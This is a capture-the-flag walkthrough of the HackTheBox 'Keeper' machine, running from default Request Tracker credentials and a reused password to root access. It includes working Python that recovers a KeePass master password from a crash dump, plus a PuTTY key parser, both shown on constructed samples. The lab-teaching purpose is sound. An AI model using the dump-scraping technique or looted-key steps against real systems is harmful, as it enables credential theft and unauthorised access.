HackTheBox :: Keeper
Creator: knightmare
Machine URL: https://app.hackthebox.com/machines/Keeper
Difficulty: Easy
Initial enumeration
As usual, we start with a TCP nmap scan.
Only two ports are open: TCP 80 for nginx and TCP 22 for SSH.
We will target the Web Server on TCP 80 first.
nginx
After navigating to the machine IP in the browser, we are greeted with a simple web page:
After adding keeper.htb and tickets.keeper.htb to our hosts file, we can visit http://tickets.keeper.htb/rt/
Best Practical Request Tracker (RT)
We have the login page for Best Practical Request Tracker (RT):
Software version: 4.4.4
Source code: GitHub
We note that the version is fairly old, so there may be unpatched vulnerabilities. But first, we try the default RT username and password.
Fortunately, root:password works!
Interesting tickets
There is only one ticket of interest: http://tickets.keeper.htb/rt/Ticket/Display.html?id=300000
We note the information it gives us:
- root (Enoch Root) had issues with a KeePass database on Windows and attached the crash dump to the ticket.
- lnorgaard (Lise Nørgaard) removed the attachment and saved it to their home folder for security reasons.
Credentials for lnorgaard
While walking through the rest of the app, in the Admin -> Users section we find the initial (default) password for user lnorgaard, left behind in the Comments field of their account:
http://tickets.keeper.htb/rt/Admin/Users/Modify.html?id=27
The password is reused for the Linux account, so we can SSH to the box as lnorgaard.
lnorgaard
Grab the user flag from /home/lnorgaard/user.txt.
The home folder contains a ZIP archive, RT30000.zip. This must be the attachment removed from the ticket we saw earlier.
Transfer it to the attacking machine and unzip it.
We get the crash dump for KeePass and a KeePass database file.
Extracting the KeePass master password from the dump file
It may be possible to extract the master password from the dump file!
I attempted this with the following Python script: https://github.com/CMEPW/keepass-dump-masterkey
The output has issues with the non-ASCII characters. A quick Google search for dgrd med flde reveals the name of the Danish dish: Rødgrød med fløde.
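The writeup points at a script for this step but does not show what it actually looks for. The following is an added example (my own code, not the referenced script and not part of the original writeup) of the same technique. It assumes the behaviour that script relies on: the KeePass 2.x password box (versions before 2.54) left, for every keystroke after the first, a string consisting of one "●" (U+25CF) placeholder per already-typed character followed by the newly typed character in process memory, so a dump contains "●c2", "●●c3", ... and every character except the first can be read back. The dump here is constructed inline by `build_fake_dump`; real minidumps are large and noisier, but the scanning logic is the same.

```python
import re
from collections import defaultdict

# UTF-16LE bytes of U+25CF, the placeholder KeePass's password box used.
# Assumption (see lead-in): a password of length L leaves the strings
# "●"+c2, "●●"+c3, ..., "●"*(L-1)+cL in memory, one per keystroke.
BULLET = "\u25cf".encode("utf-16-le")  # b"\xcf\x25"


def find_candidates(dump: bytes, max_len: int = 64) -> dict[int, set[str]]:
    """Map 1-based password position (2 upward; position 1 never leaks) to
    the set of characters seen directly after a run of position-1 bullets."""
    candidates: dict[int, set[str]] = defaultdict(set)
    not_after_bullet = b"(?<!" + re.escape(BULLET) + b")"
    for run in range(1, max_len):
        # Exactly `run` bullets, not preceded by another bullet, then one
        # UTF-16LE code unit: the character typed at position run+1.
        pattern = re.compile(
            not_after_bullet + re.escape(BULLET * run) + b"(..)", re.DOTALL)
        for m in pattern.finditer(dump):
            try:
                ch = m.group(1).decode("utf-16-le")
            except UnicodeDecodeError:  # lone surrogate: not a real char
                continue
            if ch == "\u25cf" or not ch.isprintable():
                continue  # a longer bullet run, or binary noise
            candidates[run + 1].add(ch)
    return dict(candidates)


def reconstruct(candidates: dict[int, set[str]]) -> str:
    """Render candidates as a mask: '?' for the unknown first character or
    any gap, {ab} where several characters were seen at one position."""
    if not candidates:
        return ""
    out = ["?"]
    for pos in range(2, max(candidates) + 1):
        seen = sorted(candidates.get(pos, ()))
        if len(seen) == 1:
            out.append(seen[0])
        elif seen:
            out.append("{" + "".join(seen) + "}")
        else:
            out.append("?")
    return "".join(out)


def build_fake_dump(password: str) -> bytes:
    """Constructed stand-in for a crash dump: the leaked strings, in reverse
    order, separated by unrelated filler bytes. Not a real minidump."""
    chunks = [b"\x00" * 16]
    for i in range(len(password) - 1, 0, -1):
        chunks.append(BULLET * i + password[i].encode("utf-16-le"))
        chunks.append(b"\x00\x00SecureTextBoxEx" + b"\x00" * 5)
    return b"".join(chunks)


if __name__ == "__main__":
    dump = build_fake_dump("rødgrød med fløde")
    print(reconstruct(find_candidates(dump)))  # ?ødgrød med fløde
```

On a real dump, expect the first character to be missing and some positions to carry several candidates (other strings in memory also happen to start with bullets), so the result is a mask to interpret by hand, which is why the writeup fell back to a web search for the Danish phrase. Non-ASCII characters such as ø only survive if the bytes are decoded as UTF-16LE rather than printed byte by byte.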
I will use the kpcli utility to interact with the looted KeePass database file.
Success! The KeePass database master password is rødgrød med fløde.
Let’s find some credentials.
SSH Private Key for root
It looks like we have a PuTTY-format (.ppk) SSH private key for root!
Let's convert it to the OpenSSH format with puttygen:
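Before handing a looted .ppk to puttygen it is worth checking what it is: which key type, whether a passphrase is needed (Encryption other than none), and what the public half looks like in OpenSSH form so it can be compared against an authorized_keys file on the target. The following is an added example (my own code, not part of the original writeup, not PuTTY's) of a minimal parser for the PPK version 2 and 3 text format. The sample key below is constructed for the example: the public blob carries a toy exponent and modulus and the private lines are placeholder bytes, so it is well-formed but not a usable key.

```python
import base64
import struct


def _ssh_string(blob: bytes, offset: int = 0) -> tuple[bytes, int]:
    """Read one length-prefixed string from an SSH wire-format blob."""
    (length,) = struct.unpack_from(">I", blob, offset)
    start = offset + 4
    return blob[start:start + length], start + length


def _header_block(lines: list[str], i: int, stop: str, info: dict) -> int:
    """Consume 'Key: value' lines into info until a line starting with stop."""
    while i < len(lines) and not lines[i].startswith(stop):
        key, value = lines[i].split(":", 1)
        info[key.strip().lower()] = value.strip()
        i += 1
    if i >= len(lines):
        raise ValueError(f"missing {stop}")
    return i


def parse_ppk(text: str) -> dict:
    """Parse a PuTTY .ppk (v2 or v3) and return its metadata plus the
    public key rendered as an OpenSSH authorized_keys line."""
    lines = text.splitlines()
    first = lines[0]
    prefix = "PuTTY-User-Key-File-"
    if not first.startswith(prefix):
        raise ValueError("not a PuTTY key file")
    info = {"version": int(first[len(prefix):first.index(":")]),
            "algorithm": first.split(":", 1)[1].strip()}
    i = _header_block(lines, 1, "Public-Lines:", info)
    n_pub = int(lines[i].split(":", 1)[1])
    pub_b64 = "".join(lines[i + 1:i + 1 + n_pub])
    # PPK v3 encrypted keys carry Key-Derivation/Argon2-* lines here.
    i = _header_block(lines, i + 1 + n_pub, "Private-Lines:", info)
    info["private_lines"] = int(lines[i].split(":", 1)[1])
    i += 1 + info["private_lines"]
    tail = lines[i] if i < len(lines) else ""
    info["mac"] = tail.split(":", 1)[1].strip() if tail.startswith("Private-MAC:") else None
    # The Public-Lines base64 is the standard SSH public-key blob, whose
    # first string names the algorithm; it must agree with the header.
    blob_alg, _ = _ssh_string(base64.b64decode(pub_b64))
    info["blob_algorithm"] = blob_alg.decode()
    if info["blob_algorithm"] != info["algorithm"]:
        raise ValueError("header/blob algorithm mismatch")
    info["needs_passphrase"] = info.get("encryption", "none") != "none"
    info["openssh_public_key"] = " ".join(
        p for p in (info["algorithm"], pub_b64, info.get("comment", "")) if p)
    return info


def _b64_lines(data: bytes, width: int = 64) -> list[str]:
    b = base64.b64encode(data).decode()
    return [b[j:j + width] for j in range(0, len(b), width)]


def _toy_rsa_blob() -> bytes:
    """Constructed ssh-rsa public blob with toy e and n (not a real key)."""
    s = lambda b: struct.pack(">I", len(b)) + b
    return s(b"ssh-rsa") + s(b"\x01\x00\x01") + s(b"\x00\xc3\x9f\x1b")


_pub = _b64_lines(_toy_rsa_blob())
_priv = _b64_lines(b"\x00" * 24)  # constructed placeholder, not key material
SAMPLE_PPK = "\n".join([
    "PuTTY-User-Key-File-2: ssh-rsa", "Encryption: none",
    "Comment: rsa-key-20230519",  # hypothetical comment
    f"Public-Lines: {len(_pub)}", *_pub,
    f"Private-Lines: {len(_priv)}", *_priv,
    "Private-MAC: " + "00" * 20]) + "\n"

if __name__ == "__main__":
    k = parse_ppk(SAMPLE_PPK)
    print(k["version"], k["algorithm"], "passphrase:", k["needs_passphrase"])
    print(k["openssh_public_key"])
```

If needs_passphrase is true the kdbx entry may hold it alongside the key; otherwise `puttygen key.ppk -O private-openssh -o id_key` converts the private half directly, and the openssh_public_key line is what you would expect to find in the target's authorized_keys.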
And use the key to SSH:
We are root!
Grab the root flag in /root/root.txt and we are done.